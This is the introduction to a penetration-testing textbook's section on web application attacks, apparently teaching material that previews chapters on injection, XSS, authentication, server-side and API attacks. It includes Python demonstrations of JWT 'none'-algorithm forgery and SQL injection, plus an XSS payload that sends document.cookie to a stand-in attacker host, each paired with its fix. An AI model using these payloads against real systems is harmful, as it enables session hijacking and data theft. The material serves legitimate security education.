Part 4: Exploitation -- Web and Application Attacks

"The web is where the money is, where the data is, and where the bugs are. It is the modern attack surface, and it is not getting smaller."


If you wanted to pick one domain of offensive security where demand is highest, where bugs are most plentiful, and where a skilled tester can have the most impact, this would be it. Web applications are the front door to nearly every organization on the planet. Behind every login page, every search bar, every API endpoint sits business logic, user data, and the kind of access that makes or breaks a penetration test.

Consider the numbers for a moment. The majority of bug bounty payouts go to web application vulnerabilities. The OWASP Top 10 has been the defining document in application security since its first edition in 2003, and the vulnerabilities it describes -- injection, broken authentication, cross-site scripting (folded into the injection category in the 2021 edition) -- remain stubbornly, persistently exploitable despite being well understood. This is not because web developers are careless. It is because web applications are extraordinarily complex, the attack surface is vast, and the pace of development almost always outstrips the pace of security review.

In Part 3, we gained access to systems and escalated privileges at the operating system level. Part 4 shifts our focus to the application layer. You are going to learn how modern web applications work from an attacker's perspective, and then you are going to systematically dismantle their security controls. The ShopStack e-commerce application that we introduced in Chapter 2 becomes our primary target here, and by the end of this part, you will have extracted customer data, bypassed authentication, hijacked sessions, forged server-side requests, and exploited APIs in ways that demonstrate the real-world impact of application-level vulnerabilities.

What You Will Learn

Six chapters cover the application attack surface from fundamentals through advanced server-side exploitation and modern API security.

Chapter 18: Web Application Security Fundamentals ensures you understand the terrain before you start attacking it. We cover web application architecture in depth, walk through the OWASP Top 10, go deep on HTTP methods, headers, and status codes, and get you set up with Burp Suite -- the tool that will become your constant companion for the rest of this part. You will learn to map web applications systematically, intercept and modify requests, and understand input validation and output encoding at a level that lets you spot failures in the wild. This chapter transforms how you look at every website you visit.

Chapter 19: Injection Attacks addresses the vulnerability class that held the top spot in the OWASP Top 10 from 2010 through 2017 and still sits at number three in the 2021 edition. SQL injection is the centerpiece, and we cover it thoroughly -- UNION-based, blind, error-based, time-based, out-of-band, and second-order variants. But injection is not limited to SQL. You will learn NoSQL injection against MongoDB and similar databases, command injection that gives you OS-level access through a web application, and specialized injection types including LDAP, XPath, and server-side template injection. We cover manual exploitation in enough depth that you understand the mechanics, then introduce automated tools like sqlmap and Commix for efficient real-world testing. The ShopStack product search feature becomes our injection playground, and the progression from a simple search field to full database extraction demonstrates why keeping user data out of the query grammar -- parameterized queries first, input validation as defense in depth -- is the foundation of application security.

Chapter 20: Cross-Site Scripting and Client-Side Attacks moves to the client side. XSS remains one of the most common and most underestimated vulnerability classes. We cover reflected, stored, and DOM-based XSS, then demonstrate real exploitation -- cookie theft (where the session cookie lacks the HttpOnly flag), keylogging, phishing overlays, and session hijacking. Advanced techniques including Content Security Policy bypass, mutation XSS, and polyglot payloads prepare you for modern, hardened applications. We also cover CSRF, clickjacking, and browser-based exploitation frameworks like BeEF. When we demonstrate a stored XSS attack on ShopStack's product review feature that captures administrator credentials, the difference between "low severity" scanner findings and actual impact becomes unmistakable.

Chapter 21: Authentication and Session Attacks targets the mechanisms that determine who you are and what you can access. We systematically break authentication systems -- from basic username/password forms through OAuth 2.0, OpenID Connect, JWT implementations, SAML, and multi-factor authentication. Session management vulnerabilities, including predictable session tokens, fixation, and insufficient expiration, are covered in detail. JWT attacks are a particular focus, covering the none algorithm vulnerability (a verifier that lets the token's own header switch signature checking off), algorithm confusion attacks that turn an RS256 public key into an HS256 secret, and jku/jwks header injection that points the verifier at attacker-controlled keys. In MedSecure's patient portal, we demonstrate how a flawed OAuth implementation allows us to access any patient's medical records -- a finding that would have real regulatory consequences under HIPAA.
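The none algorithm vulnerability mentioned above is easy to see in a few lines. The following is an added example, not code from the book or from ShopStack or MedSecure: it issues a legitimate HS256 token, forges an unsigned one with alg set to none, and runs both through a verifier that trusts the header and one that pins the algorithm. Only the Python standard library is used; the secret key, the claims, and the two verifier functions are constructed for illustration.

```python
import base64
import hashlib
import hmac
import json

# Constructed for the example: the server's HMAC key. Never ship a key like this.
SECRET = b"example-only-hmac-key"


def _b64url(data: bytes) -> str:
    """JWT base64url: URL-safe alphabet with the '=' padding stripped."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    """Inverse of _b64url; re-adds the padding the token omits."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    """Compact JSON, base64url-encoded, as one dot-separated JWT segment."""
    return _b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Issue a legitimate HS256 token the way the server would."""
    header = _segment({"alg": "HS256", "typ": "JWT"})
    signing_input = f"{header}.{_segment(claims)}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url(sig)}"


def forge_none(claims: dict) -> str:
    """Attacker step: alg set to none, attacker-chosen claims, empty signature segment."""
    header = _segment({"alg": "none", "typ": "JWT"})
    return f"{header}.{_segment(claims)}."


def verify_trusting_header(token: str, secret: bytes):
    """Vulnerable verifier: lets the token's own header choose the algorithm.

    Returns the claims on success, None on rejection.
    """
    h, p, s = token.split(".")
    alg = json.loads(_b64url_decode(h)).get("alg", "")
    if alg.lower() == "none":          # "unsecured JWT": nothing left to check
        return json.loads(_b64url_decode(p))
    if alg == "HS256":
        expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, _b64url_decode(s)):
            return json.loads(_b64url_decode(p))
    return None


def verify_pinned(token: str, secret: bytes):
    """Hardened verifier: the server decides the algorithm; the header must match it."""
    h, p, s = token.split(".")
    if json.loads(_b64url_decode(h)).get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(s)):
        return None
    return json.loads(_b64url_decode(p))


if __name__ == "__main__":
    legit = sign_hs256({"sub": "alice", "role": "user"}, SECRET)
    forged = forge_none({"sub": "alice", "role": "admin"})
    print("trusting verifier, forged token:", verify_trusting_header(forged, SECRET))
    print("pinned verifier, forged token:  ", verify_pinned(forged, SECRET))
```

The attacker never needs the secret: the trusting verifier accepts the forged admin token because the header told it not to look for a signature. The pinned verifier rejects it because the application, not the token, decides which algorithm is acceptable, which is the same fix real JWT libraries apply when they require the caller to pass an explicit algorithm list.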

Chapter 22: Server-Side Attacks covers the vulnerability classes that often yield the highest impact. Server-Side Request Forgery allows you to make the server issue requests on your behalf, potentially reaching internal systems that are not exposed to the internet. XXE attacks exploit XML parsers to read files, perform SSRF, or achieve denial of service. Insecure deserialization can lead directly to remote code execution. Server-Side Template Injection turns template engines into code execution platforms. File upload vulnerabilities can place web shells on the server. And JNDI injection, exemplified by Log4Shell (CVE-2021-44228), demonstrates how a single vulnerability in a ubiquitous library can compromise millions of systems. These are the findings that make executive summaries.

Chapter 23: API Security Testing reflects the reality that modern applications are not monolithic web pages but collections of APIs. REST, GraphQL, and gRPC each present distinct attack surfaces. You will learn API reconnaissance and documentation discovery, Broken Object Level Authorization (BOLA/IDOR) attacks that let you access other users' data by manipulating identifiers, mass assignment vulnerabilities, rate limiting bypass, and business logic flaws that no automated scanner will ever find. The OWASP API Security Top 10 provides our framework. ShopStack's API -- which powers its mobile app, its partner integrations, and its single-page frontend -- is our primary target, and its vulnerabilities reflect exactly what you will find in production API deployments.

Key Themes

The web is a protocol, not a platform. Understanding HTTP at a deep level -- not just GET and POST, but the full spectrum of methods, headers, cookies, caching behaviors, and encoding schemes -- is what lets you see vulnerabilities that automated tools miss. We invest heavily in this understanding because it pays dividends in every chapter.

Input and output are everything. Nearly every web vulnerability comes down to the same fundamental failure: trusting user input or failing to properly encode output. Injection, XSS, SSRF, template injection, file upload -- they are all variations on the same theme. Once you internalize this, you start to see the pattern everywhere.
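To make the theme above concrete, and to preview the ShopStack product-search injection that Chapter 19 builds on, here is an added example (not code from the book or from ShopStack) that sends the same kind of untrusted search term through two sinks: a SQL query and an HTML page. Each sink has a vulnerable form beside its hardened form. The in-memory SQLite table, its rows, and the two attacker inputs are constructed for the example; only the Python standard library is used.

```python
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed product catalogue; 'hidden' rows should never reach the page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, hidden INTEGER)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, "keyboard", 0), (2, "mouse", 0), (3, "unreleased gadget", 1)],
    )
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    """String formatting lets the user's quote and comment characters join the SQL grammar."""
    sql = f"SELECT name FROM products WHERE hidden = 0 AND name LIKE '%{term}%'"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn: sqlite3.Connection, term: str) -> list:
    """The driver sends the value separately; quotes inside it stay data, not syntax."""
    sql = "SELECT name FROM products WHERE hidden = 0 AND name LIKE ?"
    return [row[0] for row in conn.execute(sql, (f"%{term}%",))]


def render_vulnerable(term: str) -> str:
    """Reflects the term into HTML untouched: a reflected XSS sink."""
    return f"<p>Results for {term}</p>"


def render_encoded(term: str) -> str:
    """Output encoding for the HTML text context; the browser shows the tag as text."""
    return f"<p>Results for {html.escape(term, quote=True)}</p>"


# Constructed attacker inputs: one aimed at the SQL sink, one at the HTML sink.
SQLI_TERM = "%' OR 1=1 --"
XSS_TERM = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable search:    ", search_vulnerable(db, SQLI_TERM))
    print("parameterized search: ", search_parameterized(db, SQLI_TERM))
    print("vulnerable render:    ", render_vulnerable(XSS_TERM))
    print("encoded render:       ", render_encoded(XSS_TERM))
```

The injected term closes the LIKE literal, appends OR 1=1, and comments out the rest, so the vulnerable search returns every row including the hidden one; the parameterized query treats the whole string as a pattern and matches nothing. The HTML sink shows the same split: the vulnerable renderer emits a live script tag, the encoded one emits text. Two sinks, one failure: data was allowed to become code.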

Business logic flaws are the highest-value targets. Automated scanners find the easy stuff. The findings that differentiate a skilled pentester -- the IDOR that exposes every customer's data, the race condition that lets you purchase items for free, the workflow bypass that skips the payment step entirely -- require understanding the application's business logic. These chapters teach you to think like a developer and like an attacker at the same time.

APIs are the new perimeter. As organizations adopt microservices, mobile applications, and third-party integrations, the API surface grows far beyond what traditional web application testing covers. Chapter 23 is not an afterthought -- it reflects where the industry is heading and where many of the most impactful vulnerabilities now live.

How This Part Connects

Part 3 gave you the ability to compromise infrastructure -- operating systems, network services, Active Directory. Part 4 gives you the complementary ability to compromise applications. Together, these two parts cover the vast majority of what you will encounter in professional penetration testing engagements. Many real-world attack chains combine both: a web application vulnerability provides the initial foothold, and system-level techniques achieve privilege escalation and lateral movement. Or conversely, a compromised server reveals database credentials that expose the application layer.

Part 5 extends your capabilities further with post-exploitation techniques, wireless attacks, social engineering execution, evasion, and cryptographic attacks. The web application skills you build here are directly relevant -- WAF bypass in Chapter 27 builds on your understanding of injection and XSS, and the social engineering attacks in Chapter 26 often begin with a phishing page that leverages every web concept in this part.

Open Burp Suite. It is time to proxy some traffic.

Chapters in This Part